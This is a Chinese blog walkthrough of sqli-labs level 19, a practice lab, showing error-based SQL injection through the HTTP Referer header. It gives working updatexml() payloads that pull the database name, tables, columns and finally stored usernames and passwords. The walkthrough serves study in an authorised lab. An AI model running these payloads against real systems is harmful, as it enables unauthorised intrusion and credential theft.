• sqli-labs关卡19(基于http头部报错盲注)通关思路



    前言

    此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


    一、回顾上一关知识点

    上一关我们通过http头部的user-agent值进行注入,了解了http头部的一些常见可以注入的地方。这一关同样也是http头部注入,只不过不是user-agent了。这一关我就不先看源码了,有了上一关经验。

    二、靶场第十九关通关思路

    • 1、判断注入点
    • 2、爆数据库名
    • 3、爆数据库表
    • 4、爆数据库列
    • 5、爆数据库关键信息

    1、判断注入点

    这里发现19关页面和上一关基本没区别,我们这里用一个测试账号登录(用admin)。因为登录才能记录用户的信息。(如图所示)
    在这里插入图片描述
    这里发现页面回显了一个referer字段,从上一关讲解可以知道,referer字段是http请求头部内容之一。它的作用是来记录你源地址url的,因为我没有跳转到其他页面,就是在第十九关页面输信息。所以referer字段就是第十九关的地址。因为页面带回的这个referer字段内容,那么可想而知,会不会是后台管理员把referer拼接到数据库后回显到web页面的呢?我们不妨试一试
    用 and 1=1和and 1=2 发现页面正常,排除数字型。(如图所示)
    在这里插入图片描述
    在这里插入图片描述

    直接提交单引号发现页面报错,报错语句为

    You have an error in your SQL syntax; check the manual that
    corresponds to your MySQL server version for the right syntax to use
    near ‘xxx.xxx.xxx.xxx’)’ at line 1

    在这里插入图片描述
    通过报错语句可以猜测原始语句应该是

    ('refer','ip')
    
    • 1

    因为我们多了一个单引号所以报错了,我们尝试构造payload
    也就是

    1',1)#
    
    • 1

    那么在原始语句就是

    ('refer',1)#','ip')
    
    • 1

    这样就构造成功了,页面正常(如图所示)
    在这里插入图片描述
    现在我们来看源代码看看是不是这么回事
    在这里插入图片描述
    发现是和我们想到的语句一样。因为有报错回显,无回显数据内容,所以用报错盲注。

    2、爆数据库名

    注入语句为

    1' and updatexml(1,concat(0x3a,(select database()),0x3a),1),1)#
    
    • 1

    在这里插入图片描述

    3、爆数据库表

    注入语句为

    1' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1),1)#
    
    • 1

    在这里插入图片描述
    得到关键数据库表名users

    4、爆数据库列

    注入语句为

    1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1),1)#
    
    • 1
    1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1),1)#
    
    • 1

    在这里插入图片描述
    在这里插入图片描述
    得到关键数据库列username,password

    5、爆数据库关键信息

    注入语句为

    1' and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1),1)#
    
    • 1
    1' and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1),1)#
    
    • 1

    在这里插入图片描述
    在这里插入图片描述
    得到账号密码


    总结

    这一关也是通过http头部注入,只是注入点不同。只要知道原理,和怎么构造payload的话,基本没什么问题。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

  • 相关阅读:
    Mycat2.0搭建教程
    一文带你体验MRS HetuEngine如何实现跨源跨域分析
    【仪器仪表专题】案例:936焊台如何检查发热芯损坏?
    企业现代化管理模式,数据指标体系应该如何构建?
    面了个腾讯拿28k跳槽出来的,真正见识到了跳槽天花板
    小学数学深度教学论文
    欧科云链:角力Web3.0,香港如何为合规设线?
    [Apple][macOS]没有原来的苹果设备接收验证码,怎么激活新的苹果设备(Macbook、iPhone之类)?
    迅为IMX8M开发板2gst-inspect-1.0测试
    ArcGIS Pro 3.1学习之旅 ----day01 Arcgis pro安装
  • 原文地址:https://blog.csdn.net/zyh1588/article/details/134479993